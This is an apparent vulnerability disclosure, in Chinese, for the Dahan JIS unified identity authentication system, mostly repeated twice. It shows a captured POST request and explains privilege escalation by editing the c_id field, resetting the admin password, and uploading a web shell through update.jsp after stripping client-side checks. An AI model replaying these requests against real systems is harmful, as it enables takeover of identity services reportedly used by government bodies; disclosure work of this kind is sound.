VULHUB ™

### 简要描述： 大汉通版jis统一身份认证系统漏洞打包，政府部门使用居多 ### 详细说明： 大汉通版jis统一身份认证系统: [<img src="https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg" alt="test.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg) 在用户修改信息时进行抓包发现 [<img src="https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg" alt="jims.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg) ``` POST: http://10.11.5.201:9080/jis/front/upduser_do.jsp CONTENT: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname= ``` 经过验证c_id为权限控制字段，00000为管理员，vc_loginid为登陆名称，vc_password以及 vc_pwd为密码， (1)用户权限提升: 在修改个人信息时进行抓包，将c_id修改成0000，即可提升为系统管理员， [<img...

### 简要描述： 大汉通版jis统一身份认证系统漏洞打包，政府部门使用居多 ### 详细说明： 大汉通版jis统一身份认证系统: [<img src="https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg" alt="test.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg) 在用户修改信息时进行抓包发现 [<img src="https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg" alt="jims.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg) ``` POST: http://10.11.5.201:9080/jis/front/upduser_do.jsp CONTENT: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname= ``` 经过验证c_id为权限控制字段，00000为管理员，vc_loginid为登陆名称，vc_password以及 vc_pwd为密码， (1)用户权限提升: 在修改个人信息时进行抓包，将c_id修改成0000，即可提升为系统管理员， [<img src="https://images.seebug.org/upload/201312/23205741f6a25b85e5c6883a2022a7f97fd4ca1d.jpg" alt="ppp.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23205741f6a25b85e5c6883a2022a7f97fd4ca1d.jpg) (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 [<img src="https://images.seebug.org/upload/201312/232100258be421b26d63100753b78dfc5b68aaa4.jpg" alt="admin.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/232100258be421b26d63100753b78dfc5b68aaa4.jpg) (3)任意文件上传漏洞 [<img src="https://images.seebug.org/upload/201312/232103434130e823e170c426ae0362f3fe601b3c.jpg" alt="upload.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/232103434130e823e170c426ae0362f3fe601b3c.jpg) ``` 上传地址:http://url//jis/update/update.jsp ``` 去掉本地js验证 ``` shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名 ``` [<img src="https://images.seebug.org/upload/201312/23210800d1afabfefb098c248da3e250af4e9649.jpg" alt="lkjss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23210800d1afabfefb098c248da3e250af4e9649.jpg) ----------------------------------------------------- ### 漏洞证明： 大汉通版jis统一身份认证系统: [<img src="https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg" alt="test.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23204340c22569795b284a090241425293ce0473.jpg) 在用户修改信息时进行抓包发现 [<img src="https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg" alt="jims.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23205111dc27cf7a8b5a6bd233994c16a5df9634.jpg) ``` POST: http://10.11.5.201:9080/jis/front/upduser_do.jsp CONTENT: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname= ``` 经过验证c_id为权限控制字段，00000为管理员，vc_loginid为登陆名称，vc_password以及 vc_pwd为密码， (1)用户权限提升: 在修改个人信息时进行抓包，将c_id修改成0000，即可提升为系统管理员， [<img src="https://images.seebug.org/upload/201312/23205741f6a25b85e5c6883a2022a7f97fd4ca1d.jpg" alt="ppp.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23205741f6a25b85e5c6883a2022a7f97fd4ca1d.jpg) (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 [<img src="https://images.seebug.org/upload/201312/232100258be421b26d63100753b78dfc5b68aaa4.jpg" alt="admin.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/232100258be421b26d63100753b78dfc5b68aaa4.jpg) (3)任意文件上传漏洞 [<img src="https://images.seebug.org/upload/201312/232103434130e823e170c426ae0362f3fe601b3c.jpg" alt="upload.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/232103434130e823e170c426ae0362f3fe601b3c.jpg) ``` 上传地址:http://url//jis/update/update.jsp ``` 去掉本地js验证 ``` shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名 ``` [<img src="https://images.seebug.org/upload/201312/23210800d1afabfefb098c248da3e250af4e9649.jpg" alt="lkjss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/23210800d1afabfefb098c248da3e250af4e9649.jpg) -----------------------------------------------------